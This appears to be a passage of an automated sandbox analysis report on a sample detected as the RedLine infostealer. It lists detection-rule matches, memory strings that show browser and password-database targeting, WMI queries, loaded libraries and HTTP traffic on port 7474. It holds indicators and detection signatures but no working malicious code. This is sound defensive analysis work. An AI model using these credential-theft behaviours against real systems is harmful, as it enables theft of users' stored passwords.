                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $dq,\\StringFileInfo\\000004B0\\OriginalFilename vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $dq,\\StringFileInfo\\040904B0\\OriginalFilename vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $dq,\\StringFileInfo\\080904B0\\OriginalFilename vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1781147161.000000000360E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, 00000000.00000002.1780654103.000000000170E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeBinary or memory string: OriginalFilenameImplosions.exe4 vs a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, type: SAMPLEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 0.0.a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe.ff0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000000.00000000.1644070008.0000000000FF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe PID: 5052, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/45@1/1
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_03
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3E9F.tmpJump to behavior
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: tmp3EB0.tmp.0.dr, tmp3E9F.tmp.0.dr, tmp78A0.tmp.0.dr, tmp787F.tmp.0.dr, tmp3EB1.tmp.0.dr, tmp788F.tmp.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: unknownProcess created: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe "C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exe"
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeCode function: 0_2_0314E0DF push ss; retn 0005h0_2_0314E0E2
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeCode function: 0_2_06C2D394 push FFFFFF8Bh; iretd 0_2_06C2D3A2
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeCode function: 0_2_06C2D34A push FFFFFF8Bh; iretd 0_2_06C2D34E

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7474
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7474
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 7474
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 7474
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7474 -> 49733
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\a591d3d035cf90395ad1078a415a46b5b44dd813496291b702fe36cfb22dee36_dump.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
